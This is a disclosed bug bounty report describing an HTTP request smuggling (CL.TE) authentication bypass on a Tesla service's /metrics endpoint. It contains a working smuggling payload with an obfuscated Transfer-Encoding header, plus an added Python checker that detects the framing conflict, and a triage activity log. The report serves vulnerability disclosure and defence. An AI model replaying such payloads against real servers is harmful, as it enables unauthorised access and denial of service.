Authentication Bypass through HTTP Request Smuggling on https://apm.ap.tesla.services

Disclosed by riramar
  • Engagement: Tesla
  • Disclosed date: about 4 years ago
  • Points: 40
  • Priority: P3 (Bugcrowd VRT priority rating)
  • Status: Resolved (the vulnerability has been accepted and fixed)
Summary by riramar

The service under https://apm.ap.tesla.services is vulnerable to HTTP Request Smuggling allowing an attacker to bypass front-end security controls.

Report details
  • Submitted
  • Target Location: *.tesla.services
  • Target category: Web App
  • VRT: Broken Authentication and Session Management > Authentication Bypass
  • Priority: P3
  • Bug URL: https://apm.ap.tesla.services/metrics
  • Description

    The service under https://apm.ap.tesla.services is vulnerable to HTTP Request Smuggling allowing an attacker to bypass front-end security controls.
    As a PoC I'm using the URL https://apm.ap.tesla.services/metrics, which returns 401 (Unauthorized) when accessed.

    hrs_0.png

    By performing the Burp Intruder attack below with the CL.TE payload, an attacker can bypass the front-end and access https://apm.ap.tesla.services/metrics.

    hrs_1.png

    hrs_2.png

    hrs_3.png

    Note that the path /metrics is just an example; any protected resource behind the same security controls can be exploited in the same way.
    Please check the attached video (apm.ap.tesla.services-poc.mp4) for a reference on how to reproduce; I'm providing the Burp Intruder payload below.

  • HTTP request
    POST /?cb=906971031432954 HTTP/1.1
    Transfer-Encoding : chunked
    Host: apm.ap.tesla.services
    Connection: keep-alive
    ID: §0§
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
    Content-type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 65
    
    1
    Z
    0
    
    GET /metrics HTTP/1.1
    Host: apm.ap.tesla.services
    
    0
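A defender-side check for the framing ambiguity this PoC relies on, added here as an example and not part of riramar's report or Tesla's code: it parses a constructed copy of the request above (Burp's §0§ marker and User-Agent dropped), rejects the whitespace-obfuscated Transfer-Encoding header and the Content-Length/Transfer-Encoding conflict, and shows which bytes a chunked-reading back-end would leave in the buffer as a second request.

```python
# Added example, not part of riramar's report or Tesla's code: parse a raw
# HTTP/1.1 request the way a strict front-end should and flag the framing
# ambiguity the CL.TE payload above relies on. RAW is constructed from the
# PoC on this page (Burp's §0§ marker and User-Agent dropped).
RAW = (
    "POST /?cb=906971031432954 HTTP/1.1\r\n"
    "Transfer-Encoding : chunked\r\n"   # space before ':' hides TE from a lax parser
    "Host: apm.ap.tesla.services\r\n"
    "Content-Length: 65\r\n"
    "\r\n"
    "1\r\nZ\r\n0\r\n\r\n"                # chunked body as a TE back-end reads it
    "GET /metrics HTTP/1.1\r\nHost: apm.ap.tesla.services\r\n\r\n"
)

def parse_request(raw):
    """Split a raw request into (request line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = [(n, v.strip()) for n, _, v in (l.partition(":") for l in lines[1:])]
    return lines[0], headers, body

def dechunk(body):
    """Minimal chunked decoder: return (decoded payload, bytes after the final chunk)."""
    out, pos = "", 0
    while True:
        eol = body.index("\r\n", pos)
        size = int(body[pos:eol].split(";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            pos = body.index("\r\n", pos) + 2         # skip the (empty) trailer section
            return out, body[pos:]
        out += body[pos:pos + size]
        pos += size + 2                               # chunk data plus its CRLF

def framing_findings(raw):
    """Reasons a strict gateway should reject this request instead of forwarding it."""
    _, headers, body = parse_request(raw)
    cl = [v for n, v in headers if n.strip().lower() == "content-length"]
    te = [n for n, _ in headers if n.strip().lower() == "transfer-encoding"]
    findings = []
    if any(n != n.rstrip() for n in te):
        findings.append("whitespace before ':' in Transfer-Encoding (RFC 7230 says reject)")
    if cl and te:
        findings.append("Content-Length and Transfer-Encoding both present")
        _, leftover = dechunk(body[:int(cl[0])])      # what a TE back-end has left over
        if leftover.strip():
            findings.append("smuggled request after final chunk: " + leftover.split("\r\n", 1)[0])
    return findings
```

Calling `framing_findings(RAW)` returns three rejection reasons, the last naming the GET /metrics request line that the back-end would treat as a separate, unauthenticated request.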
Activity
  1. Nick Customer published the disclosure report
  2. riramar requested disclosure
  3. Jon Customer rewarded riramar
     • Hi Ricardo, Thanks for your patience with this submission. We believe we've identified the cause of the issue on the remaining domain and we will be addressing it in the near future. I'm going to resolve the bug now so we can get you a bounty. We've decided to award based on the nature of the accessible information, and the possibility of causing a denial of service against the service. Note that DoS attacks are typically out of scope, but in this case the ease of the attack was taken into consideration. We very much appreciate the submission and hope to see more from you in the future. Happy hacking!
  4. Jon Customer changed the state to Resolved
  5. Jon Customer changed the severity to P3
  6. Jon Customer sent a message
  7. riramar sent a message
  8. Jon Customer sent a message
  9. riramar sent a message
  10. Jon Customer sent a message
  11. riramar sent a message
  12. Jon Customer changed the severity to P4
  13. Jon Customer sent a message
  14. riramar sent a message
  15. Jon Customer changed the state to Triaged
  16. Jon Customer changed the state to Unresolved
  17. Jon Customer rewarded riramar 40 points
  18. Jon Customer sent a message
  19. riramar created the submission